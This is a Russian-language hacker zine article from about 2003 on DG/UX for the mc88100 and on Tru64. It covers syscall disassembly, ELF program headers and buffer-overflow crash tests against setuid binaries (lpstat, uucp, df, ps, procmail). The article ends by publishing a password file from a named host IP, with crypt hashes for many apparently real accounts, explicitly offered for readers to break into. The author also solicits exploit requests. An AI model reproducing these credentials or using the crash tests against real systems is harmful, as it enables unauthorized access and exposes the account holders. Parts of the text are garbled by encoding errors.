
        ,┌s%$%s┐,      
       ┌$$7"^"?$$L     
      i$$',d$b,'$$;  
yyyyyyyy$ $$$$$ $$l    digital unix
^^""¤¤¤"' '%$%',$$F    by madcr 
             ,s$$?;,_             __,,__                          
             '?$'j$$$$%syyy┌┌┌┌y╕$¤¤""^"¤
                ^¤$$$¤¤"^             

                                               --  1990 born osf/1
                                               --  1998 rename to digital unix
                                               --  1999 rename to tru64

 Вышло так, что наткнулся я случайно на dgux портированный на mc88100, что меня
 особо и заинтересовало. Процессор этот основан на risc технологии, работает на 
 частоте от 25mhz (!) и является первым в своей серии (кстати опять мотороловс-
 кое изделие). Этот порт dgux зовется AViON, и версий этих портов, как и должно
 быть, тоже куча: AViON R4.11MU06, AViON 5.4.R4.11, etc. Разработки давно замо-
 рожены, но интереса ради ..

 Что слегка удивило в первую очередь, так это непостоянство системных вызовов:

 0x10054c <_.text.start+28>:     bsr              <_open>
 0x10056c <_.text.start+60>:     bsr              <_write>
 0x100570 <_.text.start+64>:     bsr              <exit>

 ..........

 0x100588 <_open>:       or              r9,r0,0x29
 0x10058c <_open+4>:     tb0             0,r0,0x80    <-- 0x80
 0x100590 <_open+8>:     br               <_cerror>
 0x100594 <_open+12>:    jmp             r1
 0x100598 <_write>:      or              r9,r0,0x44
 0x10059c <write+4>:     tb0             0,r0,0x1c2   <-- 0x1c2
 0x1005a0 <write+8>:     br               <_cerror>
 0x1005a4 <write+12>:    jmp             r1
 0x100658 <_exit>:       or              r9,r0,0x09
 0x10065c <_exit+4>:     tb0             0,r0,0x1c2   <-- 0x1c2
 0x100660 <_exit+8>:     br               <_cerror>
 0x100664 <_exit+12>:    jmp             r1

 Cледом за этим, оказалось, что elf файлы имеют процессоро-семантичные записи:
 
 Program Headers:
  Type           Offset   VirtAddr   PhysAddr   FileSiz MemSiz  Flg Align
  LOPROC+8000001 0x000200 0x00000000 0x00000000 0x00000 0x00000     0
  PHDR           0x000034 0x00100034 0x00000000 0x00100 0x00100 R E 0
  INTERP         0x000134 0x00000000 0x00000000 0x00015 0x00000 R   0
      [Requesting program interpreter: /usr/dglib/libc.so.1]
  LOAD           0x000034 0x00100034 0x00000000 0x00e80 0x00e80 R E 0x10000
  LOAD           0x000eb4 0x00110eb4 0x00000000 0x00164 0x00564 RW  0x10000
  DYNAMIC        0x000ed8 0x00110ed8 0x00000000 0x00090 0x00000 RW  0
  LOPROC+1       0x000c70 0x00100c70 0x00000000 0x00000 0x00000 R E 0
  NULL           0x000000 0x00000000 0x00000000 0x00000 0x00000     0

 Как видно одна секция вообще без флагов, другая исполнимая. Покопаться есть в
 чем :) Экспериментов ради, я дам в конце пару акаунтов на бокс. Устроите бес-
 предел - хост подохнет. 

 То, что банальной перполнухи море, это понятно сразу (время дает знать). 
 Причем не то, чтобы в каких-то хитрых аргументах, а вообще сразу в первом.
 Проверил всего около 10-20 файликов и нашлось сразу 3:

 # ls -la /usr/bin/lpstat
 -r-xr-xr-x   1 lp       lp        181472 1999ЁБ  6cЫ   5юо /usr/bin/lpstat
 # /usr/bin/lpstat `perl -e "print 'A' x 4000"`
 ╪╪╠в╦Юевюл╪г cюЇЫ - core dumped


 # ls -la /usr/bin/uucp
 ---s--x--x   1 uucp     uucp       89440 1999ЁБ  6cЫ   5юо /usr/bin/uucp
 # /usr/bin/uucp `perl -e 'print "A" x 8000'`
 ╪╪╠в╦Юевюл╪г cюЇЫ


 # ls -la /usr/bin/df
 -rwsr-xr-x   1 root     bin        17536 1995ЁБ 10cЫ  20юо /usr/bin/df
 # /usr/bin/df `perl -e "print 'A' x 1699"`
 ╪╪╠в╦Юевюл╪г cюЇЫ

 У кого возникнет интерес, пишите tons of expl shit.

 Кстати, говоря о digital unix, на всяких Tru64 (не последних версий) проблем 
 тоже не меньше, и все в тех же тупых первых аргументах :) (2003 год кстати на 
 дворе):

 > ls -la /usr/bin/ps
 -rws--x--x   1 root     bin        73984 Aug 24  2000 /usr/bin/ps
 > /usr/bin/ps AAAAAAAAAAAAAA
 Segmentation fault


 > ls -la /usr/local/bin/procmail
 -rwsr-xr-x   1 root     system    132240 Feb 12  2002 /usr/local/bin/procmail
 > /usr/local/bin/procmail
 [ctrl+c]
 procmail: Terminating prematurely
 Segmentation fault (core dumped)


 В общем довольно много веселого и интересного. Статья (если так можно сказать)
 чисто для вводного ознакомления. Не больше. 

 И как обещал в начале, некоторые акаунты на dg/ux mc88100 (211.114.147.22):

 .....
 kolas:eBzjl0QMxRXc2:151:100::/usr/account/STAFF/kolas:/sbin/sh
 informix:xq3giGUS6IEF2:152:101::/informix:/sbin/sh
 sukang::153:103::/smus/sukang:/sbin/sh
 zws:fQOj1ksjWHGCU:154:100:zung-won system user:/home/zws:/sbin/sh
 ibsi:JEYsQhfDKEc.6:155:101::/haksa/ibsi:/sbin/sh
 f6213212:wIyaiDaRoWgcY:156:603:╚╕░ш-┐ь╜┬╟╤:/usr/accont/hanbit/f6213212:/sbin/sh
 bhjun:p7uLNUiZrKQDw:232:102::/usr/accout/PROF/bhjun:/sbin/sh
 jmc65:r6O84GPgxc7sU:236:102:┴д╕э├д:/usr/account/PROF/jmc65:/sbin/sh
 workadmin:UtTPubiV8Nv5o:159:600::/workgroup/workadmin:/sbin/sh
 info7:rl6r8JjJH1DUI:160:632:└х┐╡┐ь:/usr/infoser/info7:/sbin/sh
 belegre:zDfyhKgdkl26E:363:102:▒╟┐╡╛╓:/usr/accont/PROF/belegre:/sbin/sh
 ywl-7562:iI7s7E6ABM7zc:163:102::/usr/account/PROF/ywl-7562:/sbin/sh
 pdw403:gySM5Em.FGuis:164:102::/usr/account/PROF/pdw403:/sbin/sh
 lsp415:htf.l881Uvi1.:165:102::/usr/account/PROF/lsp415:/sbin/sh
 ljy409:ir73QmHfg1caY:166:102::/usr/account/PROF/ljy409:/sbin/sh
 kbo420:7qQcxHVO3IF0.:167:102::/usr/account/PROF/kbo420:/sbin/sh
 ich410:fiBVhv2.zLhG2:168:102::/usr/account/PROF/ich410:/sbin/sh
 ivey-414:DhZ4XX1Yaxl3U:169:102::/usr/account/PROF/ivey-414:/sbin/sh
 hmy-414:Ne8rLzT158KKw:170:102::/usr/account/PROF/hmy-414:/sbin/sh
 p412:ecqjaQ3mfbn9E:171:102::/usr/account/PROF/p412:/sbin/sh
 sgcho:ae5Fin5dtzuLI:172:102::/usr/account/PROF/sgcho:/sbin/sh
 sjkang:j2ciTd35FKQi6:173:102::/usr/account/PROF/sjkang:/sbin/sh
 p518:CNZR.oTXXH/9E:174:102::/usr/account/PROF/p518:/sbin/sh
 p408:GQD7fMj4C7PjE:175:102::/usr/account/PROF/p408:/sbin/sh
 ....
